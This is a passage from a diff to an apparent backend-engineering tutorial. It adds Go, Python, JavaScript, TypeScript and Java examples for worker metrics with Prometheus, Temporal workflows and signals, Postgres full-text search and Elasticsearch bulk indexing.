+// wraps the handler instead of being called from inside it, so no task
+// body has to remember to record anything.
+func Track(taskName string) asynq.MiddlewareFunc {
+    return func(next asynq.Handler) asynq.Handler {
+        return asynq.HandlerFunc(func(ctx context.Context, t *asynq.Task) error {
+            start := time.Now()
+            // deferred, so the duration is recorded on BOTH paths
+            defer func() {
+                TaskDuration.WithLabelValues(taskName).
+                    Observe(time.Since(start).Seconds())
+            }()
+
+            if n, _ := asynq.GetRetryCount(ctx); n > 0 {
+                RetryCount.WithLabelValues(taskName).Inc()
+            }
+
+            if err := next.ProcessTask(ctx, t); err != nil {
+                TaskTotal.WithLabelValues(taskName, "failure").Inc()
+                return err
+            }
+            TaskTotal.WithLabelValues(taskName, "success").Inc()
+            return nil
+        })
+    }
+}
+
+// Start /metrics server on port 9090 (Prometheus scrapes this)
+func Serve() {
+    http.Handle("/metrics", promhttp.Handler())
+    go http.ListenAndServe(":9090", nil)
+}
+```
+
+```python title="metrics.py / Python + prometheus_client + Celery"
 # Python, Full metrics instrumentation for a worker process
 from prometheus_client import (
     Counter, Histogram, Gauge, start_http_server
@@ -1051,7 +2184,159 @@ def send_verification_email(self, user_id, email, token):
     if self.request.retries > 0:
         RETRY_COUNT.labels(task_name="send_verification_email").inc()
     _do_send_email(email, token)
-Python
+```
+
+```js title="metrics.js / Node 20+ + prom-client + BullMQ"
+// Node, Full metrics instrumentation for a worker process
+import { Counter, Histogram, Gauge, register } from 'prom-client'
+import express from 'express'
+
+// -- Define metrics ---------------------------------------------
+export const TASK_TOTAL = new Counter({
+  name: 'worker_tasks_total',
+  help: 'Total tasks processed',
+  labelNames: ['task_name', 'status'], // status=success|failure
+})
+
+export const TASK_DURATION = new Histogram({
+  name: 'worker_task_duration_seconds',
+  help: 'Task processing duration',
+  labelNames: ['task_name'],
+  buckets: [0.01, 0.05, 0.1, 0.5, 1, 5, 10, 30], // histogram bucket boundaries
+})
+
+export const QUEUE_DEPTH = new Gauge({
+  name: 'worker_queue_depth',
+  help: 'Current tasks waiting in queue',
+  labelNames: ['queue_name'],
+})
+
+export const RETRY_COUNT = new Counter({
+  name: 'worker_task_retries_total',
+  help: 'Number of task retries',
+  labelNames: ['task_name'],
+})
+
+// -- Wrapper to give any processor metrics ----------------------
+export function trackMetrics(taskName, processor) {
+  return async (job) => {
+    const end = TASK_DURATION.startTimer({ task_name: taskName })
+    if (job.attemptsMade > 0) {
+      RETRY_COUNT.inc({ task_name: taskName })
+    }
+    try {
+      const result = await processor(job)
+      TASK_TOTAL.inc({ task_name: taskName, status: 'success' })
+      return result
+    } catch (err) {
+      TASK_TOTAL.inc({ task_name: taskName, status: 'failure' })
+      throw err
+    } finally {
+      end() // records the duration on both the success and failure paths
+    }
+  }
+}
+
+// Start /metrics server on port 9090 (Prometheus scrapes this)
+const metricsApp = express()
+metricsApp.get('/metrics', async (_req, res) => {
+  res.set('Content-Type', register.contentType)
+  res.end(await register.metrics())
+})
+metricsApp.listen(9090)
+
+// -- Apply to task ----------------------------------------------
+new Worker('email', trackMetrics('send_verification_email', emailProcessor), { connection })
+
+// QUEUE_DEPTH is the one no wrapper can fill in: it describes the QUEUE,
+// not any single job, so it has to be polled on a timer.
+setInterval(async () => {
+  QUEUE_DEPTH.set({ queue_name: 'email' }, await emailQueue.getWaitingCount())
+}, 15_000)
+```
+
+```ts title="metrics.ts / TypeScript 5+ + prom-client + BullMQ"
+import type { Job } from 'bullmq'
+
+// The Prometheus rule worth burning in before you add a single label:
+// labels must be LOW cardinality. `task_name` has maybe twenty values,
+// which is fine. A user id or a job id creates a new time series per
+// user, and that is how people take their own Prometheus down. Pinning
+// the label type instead of accepting an open Record is a cheap guard.
+type TaskLabels = { task_name: string; status?: 'success' | 'failure' }
+
+// The generics keep the wrapper invisible at the call site: what goes in
+// is a processor, what comes out is the SAME processor type.
+export function trackMetrics<T, R>(
+  taskName: string,
+  processor: (job: Job<T>) => Promise<R>,
+): (job: Job<T>) => Promise<R> {
+  return async (job: Job<T>): Promise<R> => {
+    const labels: TaskLabels = { task_name: taskName }
+    const end = TASK_DURATION.startTimer(labels)
+
+    if (job.attemptsMade > 0) {
+      RETRY_COUNT.inc(labels)
+    }
+
+    try {
+      const result = await processor(job)
+      TASK_TOTAL.inc({ ...labels, status: 'success' })
+      return result
+    } catch (err) {
+      TASK_TOTAL.inc({ ...labels, status: 'failure' })
+      throw err
+    } finally {
+      end() // records the duration on both paths
+    }
+  }
+}
+```
+
+```java title="WorkerMetrics.java / Java 17+ + Micrometer + Actuator"
+// Java, Full metrics instrumentation for a worker process.
+// spring-boot-starter-actuator + micrometer-registry-prometheus give you
+// the /actuator/prometheus endpoint for free; you define the metrics.
+@Component
+public class WorkerMetrics {
+    private final MeterRegistry registry;
+
+    WorkerMetrics(MeterRegistry registry, EmailQueue queue) {
+        this.registry = registry;
+
+        // A Gauge is POLLED, not incremented: Micrometer calls this
+        // supplier at scrape time, which is the right shape for a value
+        // that describes the queue rather than any one task.
+        Gauge.builder("worker_queue_depth", queue::waitingCount)
+             .tag("queue_name", "email")
+             .register(registry);
+    }
+
+    /** Wraps any task body with the counter + histogram, like the decorator. */
+    public <T> T track(String taskName, Supplier<T> body) {
+        Timer.Sample sample = Timer.start(registry);
+        try {
+            T result = body.get();
+            registry.counter("worker_tasks_total",
+                "task_name", taskName, "status", "success").increment();
+            return result;
+        } catch (RuntimeException e) {
+            registry.counter("worker_tasks_total",
+                "task_name", taskName, "status", "failure").increment();
+            throw e;
+        } finally {
+            // stop() in the finally block, so a failed task is timed too
+            sample.stop(Timer.builder("worker_task_duration_seconds")
+                .tag("task_name", taskName)
+                .publishPercentileHistogram() // the histogram buckets
+                .register(registry));
+        }
+    }
+}
+
+// application.yml, expose the scrape endpoint on the metrics port:
+//   management.endpoints.web.exposure.include: prometheus
+//   management.server.port: 9090
 ```
 
 ### Step 2: Prometheus Configuration
@@ -1085,7 +2370,6 @@ scrape_configs:
   - job_name: "api_server"
     static_configs:
       - targets: ["api:8080"]
-YAML
 ```
 
 ### Step 3: Alert Rules
@@ -1125,7 +2409,6 @@ groups:
           severity: critical
         annotations:
           summary: "Worker {{ $labels.instance }} is down"
-YAML
 ```
 
 ### Step 4: Key Grafana Panels to Build
@@ -1208,7 +2491,7 @@ Imagine a payment workflow: charge card -> reserve inventory -> send confirmatio
 
 ### Task Queue vs Workflow Engine
 
-| Capability                     | Task Queue (Celery/Asynq)                    | Temporal                                      |
+| Capability                     | Task Queue (Celery/Asynq/BullMQ)             | Temporal                                      |
 | ------------------------------ | -------------------------------------------- | --------------------------------------------- |
 | **Individual task retries**    | Built-in                                     | Built-in                                      |
 | **Multi-step workflows**       | Manual, you chain tasks yourself             | Native, workflows are first-class             |
@@ -1246,11 +2529,15 @@ Event History
 
 Temporal persists every single event in a workflow's lifetime. This is how it achieves crash recovery, on restart it replays the history to restore state.
 
-### Example: Video Processing Workflow in Go
+### Example: Video Processing Workflow
 
-The same video upload chain task we saw in Section 9, now implemented with Temporal:
+The same video upload chain task we saw in Section 9, now implemented with Temporal. Temporal ships first-party SDKs for Go, Java, Python and TypeScript, and the shape below is deliberately the same in all of them: each step reads like an ordinary function call, and each one is recorded in the workflow history so a crash resumes at the first step that had not finished.
 
-```go
+Go Python JavaScript TypeScript Java
+
+five steps, two of them in parallel, resumable at any point
+
+```go title="workflows/video_processing.go / Go + Temporal SDK"
 // workflows/video_processing.go
 package workflows
 
@@ -1298,12 +2585,208 @@ func VideoProcessingWorkflow(ctx workflow.Context, videoID string) error {
     // Step 5: Notify user their video is ready
     return workflow.ExecuteActivity(ctx, activities.NotifyUserVideoReady, videoID).Get(ctx, nil)
 }
-Go / Temporal
 ```
 
-### Example: Human-in-the-Loop with Signals (Go)
+```python title="workflows/video_processing.py / Python + temporalio"
+# workflows/video_processing.py
+import asyncio
+from datetime import timedelta
 
-```go
+from temporalio import workflow
+from temporalio.common import RetryPolicy
+
+with workflow.unsafe.imports_passed_through():
+    from activities import (
+        encode_video, generate_thumbnails, generate_transcription,
+        process_thumbnail_images, notify_user_video_ready,
+    )
+
+
+@workflow.defn
+class VideoProcessingWorkflow:
+    """Orchestrates the entire pipeline.
+
+    Temporal persists every step, crash at any point = resume here.
+    """
+
+    @workflow.run
+    async def run(self, video_id: str) -> None:
+        # Activity options, each step has its own retry policy
+        opts = dict(
+            start_to_close_timeout=timedelta(minutes=10),
+            retry_policy=RetryPolicy(
+                maximum_attempts=3,
+                initial_interval=timedelta(minutes=1),
+                backoff_coefficient=2.0,
+            ),
+        )
+
+        # Step 1: Encode video to multiple resolutions.
+        # If the worker crashes here, the workflow resumes from step 1.
+        encoded_path = await workflow.execute_activity(encode_video, video_id, **opts)
+
+        # Step 2 + 3: Thumbnail generation AND transcription in parallel.
+        # gather() is what makes them concurrent; awaiting each in turn
+        # would quietly serialise them and double the wall-clock time.
+        await asyncio.gather(
+            workflow.execute_activity(generate_thumbnails, encoded_path, **opts),
+            workflow.execute_activity(generate_transcription, encoded_path, **opts),
+        )
+
+        # Step 4: Process thumbnails (depends on step 2 completing)
+        await workflow.execute_activity(process_thumbnail_images, video_id, **opts)
+
+        # Step 5: Notify user their video is ready
+        await workflow.execute_activity(notify_user_video_ready, video_id, **opts)
+```
+
+```js title="workflows/videoProcessing.js / Node 20+ + @temporalio/workflow"
+// workflows/videoProcessing.js
+import { proxyActivities } from '@temporalio/workflow'
+
+// Activity options, each step has its own retry policy
+const {
+  encodeVideo,
+  generateThumbnails,
+  generateTranscription,
+  processThumbnailImages,
+  notifyUserVideoReady,
+} = proxyActivities({
+  startToCloseTimeout: '10 minutes',
+  retry: { maximumAttempts: 3, initialInterval: '1 minute', backoffCoefficient: 2 },
+})
+
+// videoProcessingWorkflow, orchestrates the entire pipeline.
+// Temporal persists every step, crash at any point = resume here.
+export async function videoProcessingWorkflow(videoId) {
+  // Step 1: Encode video to multiple resolutions.
+  // If the worker crashes here, the workflow resumes from step 1.
+  const encodedPath = await encodeVideo(videoId)
+
+  // Step 2 + 3: Thumbnail generation AND transcription in parallel
+  await Promise.all([
+    generateThumbnails(encodedPath),
+    generateTranscription(encodedPath),
+  ])
+
+  // Step 4: Process thumbnails (depends on step 2 completing)
+  await processThumbnailImages(videoId)
+
+  // Step 5: Notify user their video is ready
+  await notifyUserVideoReady(videoId)
+}
+
+// Temporal ships ONE SDK for Node, written in TypeScript. It runs from
+// plain JavaScript exactly as above; what you give up is the compile-time
+// check on activity names and arguments shown in the TypeScript tab.
+//
+// The hard rule in any language: workflow code must be deterministic. No
+// Date.now(), no Math.random(), no direct fetch. Replay has to produce
+// the same decisions, so anything non-deterministic belongs in an
+// activity (or in workflow.now() / workflow.random()).
+```
+
+```ts title="workflows/videoProcessing.ts / TypeScript 5+ + @temporalio/workflow"
+import { proxyActivities } from '@temporalio/workflow'
+import type * as activities from '../activities'
+
+// `typeof activities` is the TypeScript SDK's best trick: the signatures
+// come from the REAL implementations, so renaming an activity or changing
+// its arguments breaks the build rather than breaking a replay in
+// production, weeks later, on a workflow that started before the deploy.
+const {
+  encodeVideo,
+  generateThumbnails,
+  generateTranscription,
+  processThumbnailImages,
+  notifyUserVideoReady,
+} = proxyActivities<typeof activities>({
+  // Activity options, each step has its own retry policy
+  startToCloseTimeout: '10 minutes',
+  retry: { maximumAttempts: 3, initialInterval: '1 minute', backoffCoefficient: 2 },
+})
+
+// videoProcessingWorkflow, orchestrates the entire pipeline.
+// Temporal persists every step, crash at any point = resume here.
+export async function videoProcessingWorkflow(videoId: string): Promise<void> {
+  // Step 1: Encode video to multiple resolutions.
+  // If the worker crashes here, the workflow resumes from step 1.
+  const encodedPath: string = await encodeVideo(videoId)
+
+  // Step 2 + 3: Thumbnail generation AND transcription in parallel
+  await Promise.all([
+    generateThumbnails(encodedPath),
+    generateTranscription(encodedPath),
+  ])
+
+  // Step 4: Process thumbnails (depends on step 2 completing)
+  await processThumbnailImages(videoId)
+
+  // Step 5: Notify user their video is ready
+  await notifyUserVideoReady(videoId)
+}
+```
+
+```java title="VideoProcessingWorkflow.java / Java 17+ + Temporal SDK"
+// workflows/VideoProcessingWorkflow.java
+@WorkflowInterface
+public interface VideoProcessingWorkflow {
+    @WorkflowMethod
+    void process(String videoId);
+}
+
+public class VideoProcessingWorkflowImpl implements VideoProcessingWorkflow {
+
+    // Activity options, each step has its own retry policy
+    private static final ActivityOptions OPTIONS = ActivityOptions.newBuilder()
+        .setStartToCloseTimeout(Duration.ofMinutes(10))
+        .setRetryOptions(RetryOptions.newBuilder()
+            .setMaximumAttempts(3)
+            .setInitialInterval(Duration.ofMinutes(1))
+            .setBackoffCoefficient(2.0)
+            .build())
+        .build();
+
+    // The stub looks like an ordinary object and is not one: every call
+    // on it is recorded in the workflow history.
+    private final VideoActivities activities =
+        Workflow.newActivityStub(VideoActivities.class, OPTIONS);
+
+    @Override
+    public void process(String videoId) {
+        // Step 1: Encode video to multiple resolutions.
+        // If the worker crashes here, the workflow resumes from step 1.
+        String encodedPath = activities.encodeVideo(videoId);
+
+        // Step 2 + 3: Thumbnail generation AND transcription in parallel.
+        // Async.procedure STARTS the activity and returns immediately;
+        // calling activities.generateThumbnails() directly would block.
+        Promise<Void> thumbs =
+            Async.procedure(activities::generateThumbnails, encodedPath);
+        Promise<Void> transcript =
+            Async.procedure(activities::generateTranscription, encodedPath);
+
+        // Wait for both, if either fails, the workflow fails (after its retries)
+        Promise.allOf(thumbs, transcript).get();
+
+        // Step 4: Process thumbnails (depends on step 2 completing)
+        activities.processThumbnailImages(videoId);
+
+        // Step 5: Notify user their video is ready
+        activities.notifyUserVideoReady(videoId);
+    }
+}
+```
+
+### Example: Human-in-the-Loop with Signals
+
+A **signal** is an external event delivered into a running workflow. It is what lets a workflow sit and wait for a person, for a day or for a month, without holding a thread, a connection, or a row lock anywhere.
+
+Go Python JavaScript TypeScript Java
+
+wait 24 hours for a human, and compensate if nobody answers
+
+```go title="workflows/payment_approval.go / Go + Temporal SDK"
 // workflows/payment_approval.go, Wait for human signal
 func PaymentApprovalWorkflow(ctx workflow.Context, orderID string) error {
     // Register a signal channel, external events can wake this workflow
@@ -1338,11 +2821,173 @@ func ApprovePaymentHandler(c *gin.Context) {
     temporalClient.SignalWorkflow(c, orderID, "", "approval-signal", true)
     c.JSON(200, gin.H{"status": "approved"})
 }
-Go / Temporal
+```
+
+```python title="workflows/payment_approval.py / Python + temporalio"
+# workflows/payment_approval.py, Wait for human signal
+@workflow.defn
+class PaymentApprovalWorkflow:
+    def __init__(self) -> None:
+        self._approved: bool | None = None
+
+    # A signal is just a method: external events can wake this workflow
+    @workflow.signal
+    def approve(self, approved: bool) -> None:
+        self._approved = approved
+
+    @workflow.run
+    async def run(self, order_id: str) -> None:
+        # Step 1: Process payment details
+        await workflow.execute_activity(prepare_payment, order_id, **opts)
+
+        # Step 2: Wait up to 24 hours for human approval.
+        # Temporal pauses here, no CPU/memory consumed while waiting.
+        try:
+            await workflow.wait_condition(
+                lambda: self._approved is not None,
+                timeout=timedelta(hours=24),
+            )
+        except asyncio.TimeoutError:
+            self._approved = False  # timeout, auto-reject
+
+        if not self._approved:
+            # Saga: compensate previous steps
+            await workflow.execute_activity(refund_payment, order_id, **opts)
+            return
+
+        await workflow.execute_activity(finalize_payment, order_id, **opts)
+
+
+# To send the approval signal from your API handler:
+handle = client.get_workflow_handle(order_id)
+await handle.signal(PaymentApprovalWorkflow.approve, True)
+```
+
+```js title="workflows/paymentApproval.js / Node 20+ + @temporalio/workflow"
+// workflows/paymentApproval.js, Wait for human signal
+import { condition, defineSignal, setHandler } from '@temporalio/workflow'
+
+// Register a signal, external events can wake this workflow
+export const approvalSignal = defineSignal('approval-signal')
+
+export async function paymentApprovalWorkflow(orderId) {
+  let approved
+
+  setHandler(approvalSignal, (value) => {
+    approved = value
+  })
+
+  // Step 1: Process payment details
+  await preparePayment(orderId)
+
+  // Step 2: Wait up to 24 hours for human approval.
+  // Temporal pauses here, no CPU/memory consumed while waiting.
+  const signalled = await condition(() => approved !== undefined, '24 hours')
+  if (!signalled) {
+    approved = false // timeout, auto-reject
+  }
+
+  if (!approved) {
+    // Saga: compensate previous steps
+    await refundPayment(orderId)
+    return
+  }
+  await finalizePayment(orderId)
+}
+
+// To send the approval signal from your API handler:
+//   const handle = client.workflow.getHandle(orderId)
+//   await handle.signal(approvalSignal, true)
+```
+
+```ts title="workflows/paymentApproval.ts / TypeScript 5+ + @temporalio/workflow"
+import { condition, defineSignal, setHandler } from '@temporalio/workflow'
+
+// defineSignal's type parameter is the signal's ARGUMENT list, and it is
+// shared by the workflow and the API handler that sends it. Sending a
+// string where the workflow expects a boolean is then a compile error
+// rather than a workflow that wakes up holding the wrong value.
+export const approvalSignal = defineSignal<[boolean]>('approval-signal')
+
+export async function paymentApprovalWorkflow(orderId: string): Promise<void> {
+  // `undefined` is a third state here and it matters: it distinguishes
+  // "nobody has answered yet" from "somebody rejected it", which is
+  // exactly the distinction the timeout branch below turns into a refund.
+  let approved: boolean | undefined
+
+  setHandler(approvalSignal, (value: boolean) => {
+    approved = value
+  })
+
+  // Step 1: Process payment details
+  await preparePayment(orderId)
+
+  // Step 2: Wait up to 24 hours for human approval.
+  // Temporal pauses here, no CPU/memory consumed while waiting.
+  const signalled = await condition(() => approved !== undefined, '24 hours')
+  if (!signalled) {
+    approved = false // timeout, auto-reject
+  }
+
+  if (!approved) {
+    // Saga: compensate previous steps
+    await refundPayment(orderId)
+    return
+  }
+  await finalizePayment(orderId)
+}
+```
+
+```java title="PaymentApprovalWorkflow.java / Java 17+ + Temporal SDK"
+// workflows/PaymentApprovalWorkflow.java, Wait for human signal
+@WorkflowInterface
+public interface PaymentApprovalWorkflow {
+    @WorkflowMethod
+    void run(String orderId);
+
+    // Register a signal, external events can wake this workflow
+    @SignalMethod
+    void approve(boolean approved);
+}
+
+public class PaymentApprovalWorkflowImpl implements PaymentApprovalWorkflow {
+    // Boolean, not boolean: null is the "nobody has answered yet" state.
+    private Boolean approved = null;
+
+    @Override
+    public void approve(boolean value) {
+        this.approved = value;
+    }
+
+    @Override
+    public void run(String orderId) {
+        // Step 1: Process payment details
+        activities.preparePayment(orderId);
+
+        // Step 2: Wait up to 24 hours for human approval.
+        // Temporal pauses here, no CPU/memory consumed while waiting.
+        boolean signalled = Workflow.await(Duration.ofHours(24), () -> approved != null);
+        if (!signalled) {
+            approved = false; // timeout, auto-reject
+        }
+
+        if (!approved) {
+            // Saga: compensate previous steps
+            activities.refundPayment(orderId);
+            return;
+        }
+        activities.finalizePayment(orderId);
+    }
+}
+
+// To send the approval signal from your API handler:
+//   PaymentApprovalWorkflow wf =
+//       client.newWorkflowStub(PaymentApprovalWorkflow.class, orderId);
+//   wf.approve(true); // returns as soon as Temporal accepts the signal
 ```
 
 <Callout type="info" title="When to use Temporal vs a regular task queue">
-Use a regular task queue (Celery/Asynq/BullMQ) for **simple, independent tasks**: emails, notifications, image processing. Reach for Temporal when you have **multi-step business workflows** with compensation logic, long waiting periods, human approvals, or when you need full execution history for compliance/debugging. Temporal has higher operational overhead (you run a Temporal server cluster), so don't use it unless you need it.
+Use a regular task queue (Celery / Asynq / BullMQ / Redis Streams) for **simple, independent tasks**: emails, notifications, image processing. Reach for Temporal when you have **multi-step business workflows** with compensation logic, long waiting periods, human approvals, or when you need full execution history for compliance/debugging. Temporal has higher operational overhead (you run a Temporal server cluster), so don't use it unless you need it.
 </Callout>
 
-Backend from First Principles / Chapter 10 / Task Queues. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 10 / Task Queues. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/11-full-text-search-elasticsearch.mdx
+++ b/src/content/chapters/11-full-text-search-elasticsearch.mdx
@@ -2,7 +2,7 @@
 order: 11
 title: "Full-Text Search & Elasticsearch"
 navTitle: "Full-Text Search (Elasticsearch)"
-summary: "Chapter 11 of Backend from First Principles: Full-Text Search (Elasticsearch)."
+summary: "Why ILIKE '%term%' cannot use an index and what to do instead: the inverted index, BM25 relevance scoring, fuzzy matching, and when Postgres full-text search is enough versus when you need Elasticsearch. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "elasticsearch"
@@ -25,7 +25,7 @@ From a simple `ILIKE` query that suffocates under millions of rows, to relevance
 Imagine it's **2005**. You're a backend engineer at a fast-growing e-commerce startup. The product catalog has \~5,000 items. You write a search endpoint using a classic SQL pattern:
 
 ```sql
-SQL-- Works great at 5 000 rows
+-- Works great at 5 000 rows
 SELECT * FROM products
 WHERE  name        ILIKE '%laptop%'
    OR  description ILIKE '%laptop%';
@@ -72,8 +72,8 @@ A leading `%` in a LIKE/ILIKE expression _disables_ B-tree index usage. Postgres
 
 ### What the query plan looks like
 
-```dockerfile
-SQL / EXPLAIN ANALYZEEXPLAIN ANALYZE
+```sql title="EXPLAIN ANALYZE"
+EXPLAIN ANALYZE
 SELECT id, name
 FROM  products
 WHERE name ILIKE '%laptop%';
@@ -245,14 +245,14 @@ If your company already runs ELK for logging, adding product/content search on t
 
 09
 
-## Postgres Full-Text Search in Go
+## Postgres Full-Text Search
 
 Postgres has had native full-text search since version 8.3 via the `tsvector` / `tsquery` types. It uses its own inverted index (the **GIN** index) and a BM25-variant scorer called `ts_rank`. It's not as feature-rich as Elasticsearch but perfectly adequate for moderate search needs on data already in Postgres.
 
 ### DDL: Add a GIN Index
 
-```text
-SQL-- Add a generated tsvector column and index it
+```sql
+-- Add a generated tsvector column and index it
 ALTER TABLE products
   ADD COLUMN search_vec tsvector
     GENERATED ALWAYS AS (
@@ -265,10 +265,14 @@ CREATE INDEX idx_products_fts ON products USING GIN(search_vec);
 
 `setweight('A')` means title matches outrank description matches, the Postgres equivalent of field boosting.
 
-### Go: Full-Text Search Handler
+### The Full-Text Search Handler
 
-```go
-Gopackage main
+Go Python JavaScript TypeScript Java
+
+`@@` against the GIN index, ranked by `ts_rank`, parameterised throughout
+
+```go title="main.go / Go + pgx"
+package main
 
 import (
     "context"
@@ -331,24 +335,224 @@ func main() {
 }
 ```
 
+```python title="search.py / Python + psycopg + FastAPI"
+from fastapi import FastAPI, HTTPException
+
+app = FastAPI()
+
+SQL = """
+    SELECT id, name, description,
+           ts_rank(search_vec, plainto_tsquery('english', %s)) AS rank
+    FROM   products
+    WHERE  search_vec @@ plainto_tsquery('english', %s)
+    ORDER  BY rank DESC
+    LIMIT  20
+"""
+
+
+@app.get("/search")
+async def search(q: str = ""):
+    if not q:
+        raise HTTPException(400, "missing query param q")
+
+    # plainto_tsquery converts plain text safely (no special chars needed);
+    # websearch_to_tsquery also supports AND/OR/-term syntax.
+    # The query text is a BOUND PARAMETER, never interpolated (chapter 08).
+    async with pool.connection() as conn:
+        cur = await conn.execute(SQL, (q, q))
+        rows = await cur.fetchall()
+
+    return [
+        {"id": r[0], "name": r[1], "description": r[2], "rank": r[3]}
+        for r in rows
+    ]
+```
+
+```js title="search.js / Node 20+ + node-postgres + Express"
+const SQL = `
+  SELECT id, name, description,
+         ts_rank(search_vec, plainto_tsquery('english', $1)) AS rank
+  FROM   products
+  WHERE  search_vec @@ plainto_tsquery('english', $1)
+  ORDER  BY rank DESC
+  LIMIT  20
+`
+
+app.get('/search', async (req, res) => {
+  const q = req.query.q
+  if (!q) {
+    return res.status(400).json({ error: 'missing query param q' })
+  }
+
+  try {
+    // plainto_tsquery converts plain text safely (no special chars needed);
+    // websearch_to_tsquery also supports AND/OR/-term syntax.
+    const { rows } = await pool.query(SQL, [q])
+    res.json(rows)
+  } catch (err) {
+    res.status(500).json({ error: err.message })
+  }
+})
+```
+
+```ts title="search.ts / TypeScript 5+ + node-postgres + Express"
+import type { Pool } from 'pg'
+import type { Request, Response } from 'express'
+
+interface SearchResult {
+  id: number
+  name: string
+  description: string
+  rank: number
+}
+
+const SQL = `
+  SELECT id, name, description,
+         ts_rank(search_vec, plainto_tsquery('english', $1)) AS rank
+  FROM   products
+  WHERE  search_vec @@ plainto_tsquery('english', $1)
+  ORDER  BY rank DESC
+  LIMIT  20
+`
+
+export async function search(req: Request, res: Response): Promise<void> {
+  // `req.query.q` is not a string: Express parses `?q=a&q=b` into an
+  // ARRAY, so a naive cast would hand an array straight to the driver.
+  // Narrowing it here is the difference between a 400 and a 500.
+  const q = typeof req.query.q === 'string' ? req.query.q : ''
+  if (q === '') {
+    res.status(400).json({ error: 'missing query param q' })
+    return
+  }
+
+  const { rows } = await pool.query<SearchResult>(SQL, [q])
+  res.json(rows)
+}
+```
+
+```java title="SearchController.java / Java 17+ + Spring Boot + JdbcClient"
+public record SearchResult(int id, String name, String description, double rank) {}
+
+@RestController
+class SearchController {
+    private static final String SQL = """
+        SELECT id, name, description,
+               ts_rank(search_vec, plainto_tsquery('english', ?)) AS rank
+        FROM   products
+        WHERE  search_vec @@ plainto_tsquery('english', ?)
+        ORDER  BY rank DESC
+        LIMIT  20
+        """;
+
+    private final JdbcClient db;
+
+    SearchController(JdbcClient db) {
+        this.db = db;
+    }
+
+    @GetMapping("/search")
+    ResponseEntity<?> search(@RequestParam(defaultValue = "") String q) {
+        if (q.isBlank()) {
+            return ResponseEntity.badRequest().body(Map.of("error", "missing query param q"));
+        }
+
+        // plainto_tsquery converts plain text safely (no special chars needed);
+        // websearch_to_tsquery also supports AND/OR/-term syntax.
+        // Both placeholders are bound, never concatenated (chapter 08).
+        List<SearchResult> results = db.sql(SQL)
+            .params(q, q)
+            .query(SearchResult.class)
+            .list();
+
+        return ResponseEntity.ok(results);
+    }
+}
+```
+
 <Callout type="info">
 The `@@` operator is Postgres's full-text match operator. It uses the GIN index, query time stays O(log n) regardless of table size.
 </Callout>
 
 10
 
-## Elasticsearch in Python (Official SDK)
+## Elasticsearch (Official SDKs)
 
-The official Python client is [elasticsearch-py](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html). Install:
+Elastic ships a first-party client for every language here: [elasticsearch-py](https://www.elastic.co/guide/en/elasticsearch/client/python-api/current/index.html), [go-elasticsearch](https://github.com/elastic/go-elasticsearch), [@elastic/elasticsearch](https://www.elastic.co/guide/en/elasticsearch/client/javascript-api/current/index.html) for Node and TypeScript, and the [Elasticsearch Java API Client](https://www.elastic.co/guide/en/elasticsearch/client/java-api-client/current/index.html). They are all thin wrappers over the same JSON REST API, which is worth remembering when you read the tabs: the **query DSL is identical everywhere**, only the way each language spells a nested object changes. Install:
 
-```text
-Shellpip install elasticsearch
+```bash
+pip install elasticsearch      # Python
+npm  install @elastic/elasticsearch   # Node / TypeScript
+go   get github.com/elastic/go-elasticsearch/v8   # Go
+# Java: implementation 'co.elastic.clients:elasticsearch-java:8.13.0'
 ```
 
 ### Index Setup & Bulk Insert
 
-```python
-Pythonfrom elasticsearch import Elasticsearch, helpers
+Go Python JavaScript TypeScript Java
+
+an explicit mapping (text vs keyword), then a bulk load
+
+```go title="index.go / Go + go-elasticsearch"
+// The mapping is the one decision that cannot be undone later: changing
+// a field's type means reindexing everything. "text" is analysed and
+// searchable by word; "keyword" is stored whole, for exact filters.
+mapping := `{
+  "mappings": {
+    "properties": {
+      "review":    {"type": "text"},
+      "sentiment": {"type": "keyword"}
+    }
+  }
+}`
+
+es, _ := elasticsearch.NewClient(elasticsearch.Config{
+    CloudID: "YOUR_CLOUD_ID",
+    APIKey:  "YOUR_API_KEY",
+})
+
+const index = "reviews"
+
+es.Indices.Delete([]string{index}) // ignore error if absent
+es.Indices.Create(index, es.Indices.Create.WithBody(strings.NewReader(mapping)))
+
+// Bulk insert via the BulkIndexer, which batches and retries for you.
+bi, _ := esutil.NewBulkIndexer(esutil.BulkIndexerConfig{
+    Index:         index,
+    Client:        es,
+    NumWorkers:    4,
+    FlushBytes:    5e6,          // flush every 5 MB
+    FlushInterval: 30 * time.Second,
+})
+
+f, _ := os.Open("reviews.csv")
+defer f.Close()
+
+r := csv.NewReader(f)
+_, _ = r.Read() // skip the header row
+
+for {
+    row, err := r.Read()
+    if err == io.EOF {
+        break
+    }
+    if row[0] == "" || row[1] == "" {
+        continue
+    }
+
+    doc, _ := json.Marshal(map[string]string{"review": row[0], "sentiment": row[1]})
+    bi.Add(context.Background(), esutil.BulkIndexerItem{
+        Action: "index",
+        Body:   bytes.NewReader(doc),
+    })
+}
+
+bi.Close(context.Background()) // flushes whatever is still buffered
+stats := bi.Stats()
+fmt.Printf("Inserted %d documents, %d errors\n", stats.NumFlushed, stats.NumFailed)
+```
+
+```python title="index.py / Python + elasticsearch-py"
+from elasticsearch import Elasticsearch, helpers
 import csv
 
 es = Elasticsearch(
@@ -389,10 +593,206 @@ success, errors = helpers.bulk(es, generate_docs("reviews.csv"))
 print(f"Inserted {success} documents, {len(errors)} errors")
 ```
 
+```js title="index.js / Node 20+ + @elastic/elasticsearch"
+import { Client } from '@elastic/elasticsearch'
+import { createReadStream } from 'node:fs'
+import { parse } from 'csv-parse'
+
+const es = new Client({
+  cloud: { id: 'YOUR_CLOUD_ID' },
+  auth: { apiKey: 'YOUR_API_KEY' },
+})
+
+const INDEX = 'reviews'
+
+// 1. Create index with explicit mapping
+if (await es.indices.exists({ index: INDEX })) {
+  await es.indices.delete({ index: INDEX })
+}
+
+await es.indices.create({
+  index: INDEX,
+  mappings: {
+    properties: {
+      review: { type: 'text' },       // analysed full-text
+      sentiment: { type: 'keyword' }, // exact: "positive" / "negative"
+    },
+  },
+})
+
+// 2. Bulk insert from CSV. `helpers.bulk` takes an async iterable, so the
+// file is streamed rather than read into memory, which matters the first
+// time somebody points this at a 2 GB export.
+async function* generateDocs(path) {
+  const parser = createReadStream(path).pipe(parse({ columns: true }))
+  for await (const row of parser) {
